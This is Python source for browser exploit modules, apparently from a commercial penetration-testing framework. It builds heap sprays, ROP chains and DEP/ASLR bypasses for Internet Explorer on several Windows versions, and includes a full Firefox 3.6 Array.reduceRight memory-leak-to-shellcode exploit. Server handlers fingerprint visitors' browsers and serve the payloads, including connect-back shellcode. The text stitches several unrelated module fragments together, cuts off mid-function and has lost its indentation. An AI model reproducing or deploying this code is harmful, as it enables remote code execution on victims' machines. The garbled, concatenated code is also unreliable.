heapspraycode += pack('<L', 0x00000001) # required byte
heapspraycode += pack('<L', 0x63F03E9B) # RETN 30
heapspraycode += pack('<L', landingAddress)
heapspraycode += pack('<L', landingAddress +
4) # MOV ECX,DWORD PTR DS:[ECX+20]
heapspraycode += pack(
'<L', 0x63F0237E
) # MOV EDX,DWORD PTR DS:[EAX+20] 63F0237E MSCOREIE: CALL DWORD PTR DS:[ECX+4]
heapspraycode += pack('<L', 0x63F03E9B) * 10 # RETN 30
heapspraycode += pack('<L', 0x00000001) # required byte
while len(heapspraycode) < (0x100 - 4):
heapspraycode += pack('<L', 0x63F05761) # RETN
heapspraycode += pack('<L', 0x63F03E9B) # RETN 30
depbypass = pack('<L', 0x63F05761) # RETN
depbypass += pack('<L', 0x11111111) * 0x0C # Slackspace
# depbypass using mscorie
# Clever trick using PUSHAD to get the current ESP location into the params
#
depbypass += pack('<L', 0x63f05428) # POP EDI, ESI, RET
depbypass += pack('<L', 0x63f05b01) # RETN
depbypass += pack('<L', 0x63f05b01) # RETN
depbypass += pack('<L', 0x63f05557) # POP EBP
depbypass += pack('<L', 0x63f04cb5) # Call VirtualAlloc
depbypass += pack('<L', 0x63f054c0) # POP EBX
depbypass += pack('<L', 0x000007d0) # Size
depbypass += pack('<L', 0x63f05458) # POP EDX
depbypass += pack('<L', 0x00001000) # Type
depbypass += pack('<L', 0x63f01e13) # POP ECX
depbypass += pack('<L', 0x00000040) # Protect
depbypass += pack('<L', 0x63f05afa) # PUSHAD, XOR EAX,C9027563, RET
depbypass += pack('<L', 0x63f069e3) # CALL ESP
depbypass += pack('<L', 0x11111111) # slackspace
depbypass += pack('<L', 0x11111111) # slackspace
depbypass += pack('<L', 0x11111111) # slackspace
depbypass += pack('<L', 0x11111111) # slackspace
depbypass += pack('<L', 0x11111111) # slackspace
filedata = """
<html>
<script language="JavaScript">
"""
#script code
script = """
memory = new Array();
shellcode = unescape("SHELLCODE");
//var len= shellcode.length + 0x21; //0x21 is heap header
var len=0
var heapspray = unescape("HEAPSPRAYCODE");
while(heapspray.length < 0x120000) heapspray += heapspray;
heapspray = heapspray.substring(0, 0x120000- len);
prefix = unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
heapspray = prefix + heapspray;
heapspray += unescape("DEPBYPASSCODE") + shellcode;
try{
for(var i = 0; i < 400; i++) {
memory[i]= heapspray.substring(0,heapspray.length);
}
}
catch(err)
{}
"""
script = script.replace(
'SHELLCODE',
wp_urluencode(wp_randomnops(4) + self.shellcode + ("\x00" * 100)))
script = script.replace('HEAPSPRAYCODE', wp_urluencode(heapspraycode))
script = script.replace('DEPBYPASSCODE', wp_urluencode(depbypass))
#Obfuscate the script code (not used)
filedata += script
# Add the reset of the filedata
filedata += """
</SCRIPT>
<div style="position: absolute; top: -999px;left: -999px;">
<link href="css4.css" rel="stylesheet" type="text/css" />
</html>
"""
return filedata
def makefileWinXP(self, browser):
# Exploit for Windows XP (DEP Bypass)
landingAddress = 0x126A1000 #0x126A1000
# Build our heapspray repeated block to get to this vtable jmp
# 4384F78D 8B46 5C MOV EAX,DWORD PTR DS:[ESI+5C]
#
#43681BE1 8B49 20 MOV ECX,DWORD PTR DS:[ECX+20]
#43681BE4 8B01 MOV EAX,DWORD PTR DS:[ECX]
#43681BE6 8B50 20 MOV EDX,DWORD PTR DS:[EAX+20]
#43681BE9 -FFE2 JMP EDX
if browser == "MSIE 8.0":
heapspraycode = pack('<L', 0x77C21A57) #the slide of RETN
heapspraycode += pack('<L', landingAddress +
8) # MOV EAX,DWORD PTR DS:[ECX]
heapspraycode += pack('<L',
0x77C3335C) # FIRST STACK PTR (RETN 80)
heapspraycode += pack('<L', 0x77C21A57) # Start the slide of RETN
heapspraycode += pack('<L', landingAddress)
heapspraycode += pack('<L', landingAddress)
heapspraycode += pack('<L', 0x00000001) # required byte
heapspraycode += pack('<L', 0x126A10FF) # To pass the TEST AL,AL
heapspraycode += pack('<L', landingAddress)
heapspraycode += pack('<L', landingAddress +
4) # MOV ECX,DWORD PTR DS:[ECX+20]
heapspraycode += pack(
'<L', 0x77C15ED5
) # MOV EDX,DWORD PTR DS:[EAX+20] JMP EDX (77C15ED5 XCHG EAX,ESP)
heapspraycode += pack('<L', landingAddress) * 10
heapspraycode += pack('<L', 0x00000001) # required byte
while len(heapspraycode) < (0x100 - 4):
heapspraycode += pack('<L', 0x77C21A57) # 77C11110 RETN
heapspraycode += pack('<L', 0x77C3335C) # RETN 80
else:
heapspraycode = pack('<L', 0x77C21A57) #the slide of RETN
heapspraycode += pack('<L', landingAddress +
8) # MOV EAX,DWORD PTR DS:[ECX]
heapspraycode += pack('<L',
0x77C3335C) # FIRST STACK PTR (RETN 80)
heapspraycode += pack('<L', 0x77C21A57) # Start the slide of RETN
heapspraycode += pack('<L', landingAddress)
heapspraycode += pack('<L', 0x00000001) # required byte
heapspraycode += pack('<L',
0x126A10FF) # To pass the TEST AL,AL
heapspraycode += pack('<L', landingAddress)
heapspraycode += pack('<L', landingAddress +
4) # MOV ECX,DWORD PTR DS:[ECX+20]
heapspraycode += pack('<L', landingAddress)
heapspraycode += pack(
'<L', 0x77C15ED5
) # MOV EDX,DWORD PTR DS:[EAX+20] JMP EDX (77C15ED5 XCHG EAX,ESP)
while len(heapspraycode) < (0x100 - 4):
heapspraycode += pack('<L', 0x77C21A57) # 77C11110 RETN
heapspraycode += pack('<L', 0x77C3335C) # RETN 80
depbypass = pack('<L', 0x77C21A57) # RETN
depbypass += pack('<L', 0x11111111) * 0x20 # Slackspace
depbypass += self.wp_UniversalDEPBypassWinXP_VP(
len(self.shellcode) + 8)
filedata = """
<html>
<script language="JavaScript">
"""
#script code
script = """
memory = new Array();
shellcode = unescape("SHELLCODE");
//var len= shellcode.length + 0x21; //0x21 is heap header
var len=0
var heapspray = unescape("HEAPSPRAYCODE");
while(heapspray.length < 0x120000) heapspray += heapspray;
heapspray = heapspray.substring(0, 0x120000- len);
prefix = unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
heapspray = prefix + heapspray;
heapspray += unescape("DEPBYPASSCODE") + shellcode;
try{
for(var i = 0; i < 400; i++) {
memory[i]= heapspray.substring(0,heapspray.length);
}
}
catch(err)
{}
"""
script = script.replace(
'SHELLCODE',
wp_urluencode(wp_randomnops(4) + self.shellcode + ("\x00" * 100)))
script = script.replace('HEAPSPRAYCODE', wp_urluencode(heapspraycode))
script = script.replace('DEPBYPASSCODE', wp_urluencode(depbypass))
#Obfuscate the script code (not used)
filedata += script
# Add the reset of the filedata
filedata += """
</SCRIPT>
<div style="position: absolute; top: -999px;left: -999px;">
<link href="css4.css" rel="stylesheet" type="text/css" />
</html>
"""
return filedata
def makefileIE7_part1(self):
# Exploit for Windows Vista IE 7
# This page loads the .Net DLL
# .Net DLL ASLR/DEP Bypass
filedata = """
<html>
<object classid="OURDLL#exploit.Shellcode" height="0" width="0"></object>
<iframe src=/page2.htm></iframe>
</html>
"""
filedata = filedata.replace('OURDLL',
self.filename.replace('.html', '.dll'))
return filedata
def makefileIE7_part2(self):
# Exploit for Windows Vista IE 7
# This part returns the created .net dll
# .Net DLL ASLR/DEP Bypass
p = PElib()
filedata = p.createDotNETPEFileBuf(self.createShellcode(), self.pc)
return filedata
def makefileIE7_part3(self):
# Exploit for Windows Vista IE 7
# This part triggers the exploit
# .Net DLL ASLR/DEP Bypass
landingAddress = 0x126A1000 #0x126A1000
# Build our heapspray repeated block to get to this vtable jmp
# 4384F78D 8B46 5C MOV EAX,DWORD PTR DS:[ESI+5C]
#
#43681BE1 8B49 20 MOV ECX,DWORD PTR DS:[ECX+20]
#43681BE4 8B01 MOV EAX,DWORD PTR DS:[ECX]
#43681BE6 8B50 20 MOV EDX,DWORD PTR DS:[EAX+20]
#43681BE9 -FFE2 JMP EDX
heapspraycode = pack('<L', 0x77C21A57) #the slide of RETN
heapspraycode += pack('<L',
landingAddress + 8) # MOV EAX,DWORD PTR DS:[ECX]
heapspraycode += pack('<L',
landingAddress) # FIRST STACK PTR (RETN 80)
heapspraycode += pack('<L', landingAddress) # Start the slide of RETN
heapspraycode += pack('<L', landingAddress)
heapspraycode += pack('<L', 0x00000001) # required byte
heapspraycode += pack('<L', 0x126A10FF) # To pass the TEST AL,AL
heapspraycode += pack('<L', landingAddress)
heapspraycode += pack('<L', landingAddress +
4) # MOV ECX,DWORD PTR DS:[ECX+20]
heapspraycode += pack('<L', landingAddress)
heapspraycode += pack(
'<L', self.pc
) # MOV EDX,DWORD PTR DS:[EAX+20] JMP EDX (77C15ED5 XCHG EAX,ESP)
while len(heapspraycode) < (0x100):
heapspraycode += pack('<L', landingAddress) # Buffer
filedata = """
<html>
<script language="JavaScript">
"""
#script code
script = """
memory = new Array();
shellcode = unescape("SHELLCODE");
//var len= shellcode.length + 0x21; //0x21 is heap header
var len=0
var heapspray = unescape("HEAPSPRAYCODE");
while(heapspray.length < 0x120000) heapspray += heapspray;
heapspray = heapspray.substring(0, 0x120000- len);
prefix = unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111");
heapspray = prefix + heapspray;
try{
for(var i = 0; i < 400; i++) {
memory[i]= heapspray.substring(0,heapspray.length);
}
}
catch(err)
{}
"""
script = script.replace('HEAPSPRAYCODE', wp_urluencode(heapspraycode))
#Obfuscate the script code (not used)
filedata += script
# Add the reset of the filedata
filedata += """
</SCRIPT>
<div style="position: absolute; top: -999px;left: -999px;">
<link href="css4.css" rel="stylesheet" type="text/css" />
</html>
"""
return filedata
def makefile(self, browser, osversion):
if osversion == "Windows XP":
self.log('WP> Serving Windows XP exploit')
return self.makefileWinXP(browser)
if browser == "MSIE 8.0":
self.log('WP> Serving MSIE 8.0 exploit')
return self.makefileIE8_VistaWin7_part1()
if browser == "MSIE 7.0":
self.log('WP> Serving MSIE 7.0 exploit')
return self.makefileIE7_part1()
# Default to a non ASLR version
self.log('WP> Serving Non ASLR Exploit')
return self.makefileWinXP(browser)
def makecssfile(self, browser, osversion):
#0x126A10C0
address = u"\u1000\u126a"
filedata = "\xef\xbb\xbf" # UTF-8 Header Bytes
filedata += """*{
color:red;
color:blue;
}
@import url("\x01\x01ADDRESS");
@import url("css4.css");
@import url("css4.css");
@import url("css4.css");""".replace("ADDRESS", address.encode('utf-8'))
return filedata
def makesploit(self, clientheader, clientbody):
self.createShellcode()
# The main call from ClientD
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
self.log('WP> ****************************************')
self.log("WP> URL Received: %s" % clientheader.URL)
user_agent = clientheader.getStrValue(['User-Agent'])
cookies = clientheader.getStrValue(['Cookie'])
# Get details
browser, osversion = wp_browserinfo(user_agent)
self.log('WP> OSVersion: %s' % osversion)
self.log('WP> Browser: %s' % browser)
self.log('WP> ')
#self.log('WP> User agent of connecting host: %s' % user_agent)
#self.log('WP> Cookies of connecting host: %s' % cookies)
if clientheader.URL.count(self.filename):
if cookies.count("SessionID"):
self.log('WP> Exploit already sent to this client')
self.log('WP> Returning blank page')
data = ""
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
else:
self.log('WP> Serving exploit html file')
data = self.makefile(browser, osversion)
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
h.addHeader('Set-Cookie',
'SessionID=%d' % self.jsObfuscator.getXORKey())
elif (clientheader.URL.count('.dll')):
if browser == "MSIE 7.0":
self.log('WP> Serving IE7 .Net DLL file')
data = self.makefileIE7_part2()
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'application/octet-stream')
else:
self.log('WP> Serving IE8 .Net DLL file')
data = open(
'3rdparty/White_Phosphorus/exploits/wp_quicktime_punk/ourdll.dll'
).read()
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'application/octet-stream')
elif (clientheader.URL.count('page2.htm')):
if cookies.count("SessionID2"):
self.log('WP> Exploit already sent to this client')
self.log('WP> Returning blank page')
data = ""
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
else:
self.log('WP> Serving exploit secondary file')
if browser == "MSIE 7.0":
data = self.makefileIE7_part3()
else:
data = self.makefileIE8_VistaWin7_part2()
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
h.addHeader('Set-Cookie',
'SessionID2=%d' % self.jsObfuscator.getXORKey())
elif (clientheader.URL.count('.css')):
self.log('WP> Serving exploit css file')
data = self.makecssfile(browser, osversion)
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
else:
self.log('WP> Redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'text/html')
self.log('WP> ****************************************')
return h, b
def run(self):
if (self.version == 0):
filedata = self.makefile('', 'Windows XP')
elif (self.version == 1):
filedata = self.makefile('MSIE 7', '')
elif (self.version == 2):
filedata = self.makefile('MSIE 8', '')
self.log("WP> Opening %s" % (self.filename))
fd = file(self.filename, 'wb+')
fd.write(filedata)
fd.close()
self.log('WP> Wrote to %s' % (self.filename))
return 1
class theexploit(httpclientside):
def __init__(self):
tcpexploit.__init__(self)
httpclientside.__init__(self)
self.searchMethod = self.FindBrowser_FindAnyTag_CmpExtraInfo
self.UserAgent = [("Mozilla/", "Firefox", "")]
self.plugin_info = None # we want clientd to give us a plugin dict
self.supports_dns_mosdef = False
self.shellcode = "\xcc" * 298
self.setVersions()
self.version = 1
self.badstring = ""
self.name = NAME
self.filename = "".join( [ random.choice(string.uppercase) for x in range(8) ] ) + ".html"
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
def random_dummy_string(self, prefix=""):
h = hashlib.new('sha1')
h.update(str(random.random() * 10).replace('.', ''))
retval = h.hexdigest()
retval = '%s%.5s' % (prefix, retval)
return retval
# This is expecting an info_dict that is populated like so:
#
# info_dict['plugins'] = parse_plugin_data(plugins_dict)
# info_dict['user_agent'] = clientheader.getStrValue(['User-Agent'])
#
# self.plugin_info comes from clientd in parse_plugin_data scrubbed format
def is_vulnerable(self, info_dict):
parsed = user_agent_parser.Parse(info_dict['user_agent'])
if 'Windows' in parsed['os']['family'] and \
parsed['user_agent']['family'] == 'Firefox' and \
parsed['user_agent']['major'] == '3' and \
parsed['user_agent']['minor'] == '6' and \
parsed['user_agent']['patch'] in ('16', '17'):
return 100
self.log("Did not detect vulnerable version of Firefox - bailing out.")
return 0
def displayVersions(self):
for v in self.versions.keys():
print "Version %d: %s" % (v, self.versions[v][0])
def setVersions(self):
self.versions = {}
#name, jmp esp, writeloc, writable, shelloc
self.versions[1] = ("Windows - all versions", None)
def neededListenerTypes(self):
return self.clientSideListenerTypes()
def makefile(self):
replaces = {}
replaces["[SHELLCODE]"] = urluencode(self.shellcode)
filedata = """
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Array.reduceRight</title>
</head>
<body>
<script type="application/javascript">
"""
js = """
var sprayed_chunks = [];
var dom_elements_array = new Array();
var fake_strings_base = 0x0E000014; // a fake str block will be here
var fake_strings_size = 0x00800000;
//var dom_leak_address = 0x12200074; // start address to search for our tags and dom objs.
var dom_leak_addresses = [0x12200074, 0x04900074, 0x08200074] // to search in 3 diff places
var shellcode_base = 0x18000014; // a shellcode sprayed block will be here
var search_tags = [0x66666666, 0x77777777, 0x11112222];
var search_str_tag = String.fromCharCode(0x6666) + String.fromCharCode(0x6666) + String.fromCharCode(0x7777) + String.fromCharCode(0x7777);
var vtable_found = false;
var dom_vtable_address = 0;
var xul_version = null;
var virtualalloc_ptr = 0;
var gadget_1 = 0;
var gadget_2 = 0;
var gadget_3 = 0;
var gadget_4 = 0;
var gadget_5 = 0;
var gadget_6 = 0;
var gadget_7 = 0;
var gadget_8 = 0;
var gadget_9 = 0;
reduceCallbackExploit = function(prev, current, index, array) {
var o = current[0];
throw "<STOP REDUCECALLBACK>"; // just in case
}
reduceCallbackLeak = function(prev, current, index, array) {
var offset = 0;
var vtable_low = 0;
if (xul_version == "1.9.2.16") {
vtable_low = 0x000017B0;
}
else {
if (xul_version == "1.9.2.17") {
vtable_low = 0x0000C3E8;
}
}
while (true) {
var index = current.indexOf(search_str_tag, offset);
if (index != -1) {
var s1 = current.substr(index, 8);
var leaked_info = [];
for(var i=0; i < s1.length; i+=2) {
high = new Number(s1.charCodeAt(i+1));
low = new Number(s1.charCodeAt(i));
data = (high << 16) + low;
leaked_info.push(data);
}
// To find our DOM obj we search for two tags and make sure is NOT followd by the third search tag.
// Also we make sure that the value that is supposed to be the vtable is greater than 0x20000000 because
// sometimes we may get other kind of values there
if ( leaked_info[0] == search_tags[0] &&
leaked_info[1] == search_tags[1] &&
leaked_info[2] != search_tags[2] ) {
if ((leaked_info[3] & 0x0000FFFF) == vtable_low) {
vtable_found = true;
dom_vtable_address = leaked_info[3];
throw "<STOP REDUCECALLBACK>"; // exit
}
else {
offset = index+160;
}
}
else {
// if we find the tags but not the vtable we keep searching adding to the offset
offset = index+7950;
}
}
else {
throw "<STOP REDUCECALLBACK>"; // this is to stop reduceRight from keep calling the callback for other elements in the array
}
}
}
function trigger(address, explotar) {
var boom = new Array();
// do some math to set the appropiate length to the array to access the given address
value = address / 4 + 0x80000001;
// For FF4 length value = ( (address - EAX) / 8 ) + 0x80000000 but EAX value is not fixed..
boom.length = value;
try {
if (explotar)
boom.reduceRight(reduceCallbackExploit,0,0,0);
else
boom.reduceRight(reduceCallbackLeak,0,0,0);
}
catch(ex){
// an empty catch to get all the stop reduce exceptions we throw
}
}
function str_hexa_pad4(str) {
while (str.length < 4)
str = "0" + str;
return str.toUpperCase();
}
function str_hexa_pad(str) {
while (str.length < 8)
str = "0" + str;
return "0x" + str.toUpperCase();
}
function str_hexa(val)
{
var str = new Number(val).toString(16);
return str_hexa_pad(str);
}
function hexa(val)
{
var str = new Number(val).toString(16);
return str_hexa_pad4(str);
}
function myescape(addr) {
var str = "";
str = "%u" + hexa(addr & 0xffff) + "%u" + hexa((addr >> 16) & 0xffff);
return unescape(str);
}
function create_fake_strings_block(block_size) {
var str_block = "";
str_block += unescape("%uAAAA"); // padding to align
for(var i=0; i < dom_leak_addresses.length; i++) {
str_block += myescape(fake_strings_base + 0x8 + 0x10*i); // fake_strings_base points to this
// It contians an address that ends with C so when using the mask to check the tagged js obj with 0x4 it interprets it as a valid string
str_block += myescape(fake_strings_size); // fake string size to be able to read alot
str_block += myescape(dom_leak_addresses[i]); // ptr to address I want to read (this is the fake str)
str_block += myescape(0x12345678); //padding to create another fake str
}
while(str_block.length < block_size - 10){
str_block+=unescape("%uCCCC%u9090"); // this could be random...
}
return str_block;
}
function create_dummy_str_block(block_size) {
var str_block = "";
//str_block += unescape("%uAAAA");
for(var j=0; j < 17; j++) { // some padding to place our search tags
str_block += myescape(0xBADF00D0 + j);
}
// these 2 dwords are used as tags to search our dom objects to get a vtable
str_block += myescape(search_tags[0]);
str_block += myescape(search_tags[1]);
while(str_block.length < block_size) {
str_block += myescape(search_tags[2]);
}
return str_block;
}
function create_shellcode_block(block_size) {
// rop chain needed based on xul.dll
var block = "";
// set things to make a call to our stack pivot
block += unescape("%uAAAA") // padding to align
block += myescape(shellcode_base+0x4); // shellcode_base points here
block += myescape(shellcode_base+0xC);
block += myescape(gadget_2); // Gadget 2 - POP EAX; RET to load VirtualAlloc address
block += myescape(shellcode_base+0x4C); // there must be 1 dword after the addres where this value points and then the first rop gadget
block += myescape(virtualalloc_ptr); // ESP points here after gadget 1
block += myescape(gadget_3); // Gadget 3 - MOV EAX, [EAX]; RET
block += myescape(gadget_4); // Gadget 4 - CALL EAX; RET
// Parameters for virtualalloc
block += myescape(0x0); // NULL
block += myescape(0x10000); // size
block += myescape(0x3000); // MEM_COMMIT | MEM_RESERVE
block += myescape(0x40); // PAGE_EXECUTE_READWRITE
block += myescape(gadget_5); // Gadget 5 - XCHG EDI,EAX; RET
block += myescape(gadget_6); // Gadget 6 - set eax = edi ; set esi = shellcode - MOV EAX,EDI; POP ESI; RETN
block += myescape(shellcode_base+0x5C); // Address where shellcode is
block += myescape(gadget_7); // Gadget 7 - ecx = sizeof(shellcode) - POP ECX, RET
block += myescape(0x1000); // sizeof(shellcode)
block += myescape(gadget_8); // Gagdet 8 - memcpy - REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
block += myescape(0x11112222); // dummy
block += myescape(0x33334444); // dummy
block += myescape(gadget_9); // Gadget 9 - jmp to shellcode - JMP EAX
block += myescape(0x55556666); // this will be shellcode_base+0x4C
block += myescape(dom_vtable_address);
// this addr right below will be in ECX and js3250!js_Interpret+0x48cf -> call ecx will use it to begin our RCE
block += myescape(gadget_1); // Gadget 1 - Stack pivot - this content will be put in 0 by this very same gadget
// 104CC407 56 PUSH ESI
// 104CC408 5C POP ESP
// 104CC409 8366 44 00 AND DWORD PTR DS:[ESI+44],0
// 104CC40D 33C0 XOR EAX,EAX
// 104CC40F 5E POP ESI
// 104CC410 C2 0400 RETN 4
// the vtable we are leaking is this one
// const nsHTMLTextAreaElement::`vftable'{for `nsGenericHTMLElement'} dd offset nsHTMLTextAreaElement::QueryInterface(nsID const &,void * *)
var shellcode = unescape("[SHELLCODE]");
block += shellcode;
while(block.length < block_size - 10){
block+=unescape("%uCCCC%u9090"); // this could be random
}
return block;
}
function spray_str(str, quant){
var t = new Array();
for(var i=0; i < quant; i++){
t[i] += str;
}
return t;
}
function do_shellcode_spray() {
setup_gadgets();
var spray = create_shellcode_block(0x7FFFF);
sprayed_chunks.push(spray_str(spray,0x90));
}
function do_fake_strings_spray() {
// we want to leak the contents of the dom_leak_address address that will give us a vtable
var spray = create_fake_strings_block(0x7FFFF);
sprayed_chunks.push(spray_str(spray,0x80));
}
function do_dummy_str_spray() {
var spray = create_dummy_str_block(0x40);
sprayed_chunks.push(spray_str(spray,1));
}
function do_textarea_spray() {
for(var a=0; a < 0x3000; a++) {
var e = document.createElement("textarea");
dom_elements_array[a] = e;
do_dummy_str_spray(); // this will put a mark between our dom objects and we'll use it to find the vtable
}
}
function is_vulnerable() {
var ua = navigator.userAgent;
var ffregex = /Firefox\/3.6.1(6|7)/i;
var xulregex = /; rv:(.*)\) /i;
m = ffregex.exec(ua);
if (m.length > 0) {
m = xulregex.exec(ua);
if (m.length > 1) {
xul_version = m[1];
return true;
}
}
return false;
}
function setup_gadgets() {
if (xul_version == "1.9.2.16") {
virtualalloc_ptr = dom_vtable_address-0x1A9524;
gadget_1 = dom_vtable_address-0x51F0C0;
gadget_2 = dom_vtable_address-0x9DEDDB;
gadget_3 = dom_vtable_address-0x9DD6A2;
gadget_4 = dom_vtable_address-0x8DF1BD;
gadget_5 = dom_vtable_address-0x9BF3F4;
gadget_6 = dom_vtable_address-0x9C9CCF;
gadget_7 = dom_vtable_address-0x9E063D;
gadget_8 = dom_vtable_address-0x9DF973;
gadget_9 = dom_vtable_address-0x9DD304;
}
else {
if (xul_version == "1.9.2.17") {
virtualalloc_ptr = dom_vtable_address-0x1A6164;
gadget_1 = dom_vtable_address-0x51FFE1;
gadget_2 = dom_vtable_address-0x9E9A72;
gadget_3 = dom_vtable_address-0x9E890C;
gadget_4 = dom_vtable_address-0x8D7FA5;
gadget_5 = dom_vtable_address-0x8AE69F;
gadget_6 = dom_vtable_address-0x9D273F;
gadget_7 = dom_vtable_address-0x9EB35B;
gadget_8 = dom_vtable_address-0x9EA2C1;
gadget_9 = dom_vtable_address-0x98F16E;
}
else {
throw "Browser not supported";
}
}
}
function search_vtable() {
var x = 0;
while ( (x < dom_leak_addresses.length) && (!vtable_found) ) {
trigger(fake_strings_base + 0x10*x, false);
x++;
}
}
function Exploit()
{
if (is_vulnerable()) {
do_fake_strings_spray(); // some strings to read with the leak
do_textarea_spray(); // some DOM objects to get their vtable ref
search_vtable();
if (vtable_found) {
do_shellcode_spray();
trigger(shellcode_base, true); // trigger the RCE
}
else {
document.write("Failed...");
}
}
else {
document.write("Browser not supported");
}
}
setTimeout("Exploit();", 1000);
"""
for k,v in replaces.iteritems():
js = js.replace(k,v)
#filedata += self.jsObfuscator.obfuscate(js)
filedata+=js
filedata += """
</script>
</body>
</html>"""
return filedata
def makesploit(self,clientheader,clientbody):
"""
Construct the attack
"""
h = header("SERVER")
b = body()
self.log("Request: " + clientheader.URL)
if clientheader.URL.count(self.filename):
#the exploit
self.log("sending HTML")
self.createShellcode()
sploitstring = self.makefile()
b.setBody(sploitstring)
h.addHeader('Set-Cookie', 'SessionID=%d' % self.jsObfuscator.getXORKey())
h.addHeader("Content-Type", "text/html")
else:
#redirect to self
self.log("redirecting to self")
h.status = "302"
h.addHeader("Location", self.filename)
h.addHeader("Content-Type", "text/html")
return h, b
class theexploit(wp_exploit, httpclientside):
PAYLOADS = ["IE Inject Connect Back", "Execute Command"]
DEFAULT_PAYLOAD = 0
def __init__(self):
wp_exploit.__init__(self)
httpclientside.__init__(self)
self.setInfo(DESCRIPTION)
self.setInfo(VERSION)
self.name = NAME
self.targets = targets
self.version = 0
self.isClientD = False
self.use_universal = True
self.encode_printable = True
self.alignstack = True
self.badstring = "\x00\x09\x0a\x0b\x0c\x0d\x22\x5c"
self.filename = "".join(
[random.choice(string.uppercase) for x in range(8)]) + ".html"
self.filename2 = "".join(
[random.choice(string.uppercase) for x in range(8)]) + ".html"
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
return
def is_vulnerable(self, info_dict):
"""
Check for IE
"""
self.isClientD = True
if "MSIE" in info_dict['user_agent']:
self.log("WP> Target has MSIE")
language = info_dict['plugins'].get("language", "")
if type(language) == type([]):
language = language[0]
self.log("WP> language found: %s" % language)
if "en-us" in language:
return 95
else:
return 20
return 0
def usage(self):
self.wp_usage(targets, "-F <filename>")
return
def neededListenerTypes(self):
self.getArgs()
return self.wp_createWin32Listener()
def createShellcode(self):
self.getArgs()
self.log('WP> Targeting version %d: %s' %
(self.version, targets[self.version][0]))
return self.wp_createShellcode()
def getArgs(self):
if getattr(self, 'useSSLMOSDEF', False):
self.isClientD = True
self.DEFAULT_PAYLOAD = 1
else:
if self.HTTPMOSDEF:
if self.useSSLMOSDEF:
self.DEFAULT_PAYLOAD = 1
else:
self.DEFAULT_PAYLOAD = 2
self.wp_getShellcodeType()
if self.target:
self.host = self.target.interface
self.filename = self.argsDict.get('filename', self.filename)
return
def displayVersions(self):
for t in targets.keys():
print 'WP> Version %d: %s' % (t, targets[t][0])
return
def makefile(self, browser, osversion):
if osversion == "Windows XP":
if browser == "MSIE 8.0":
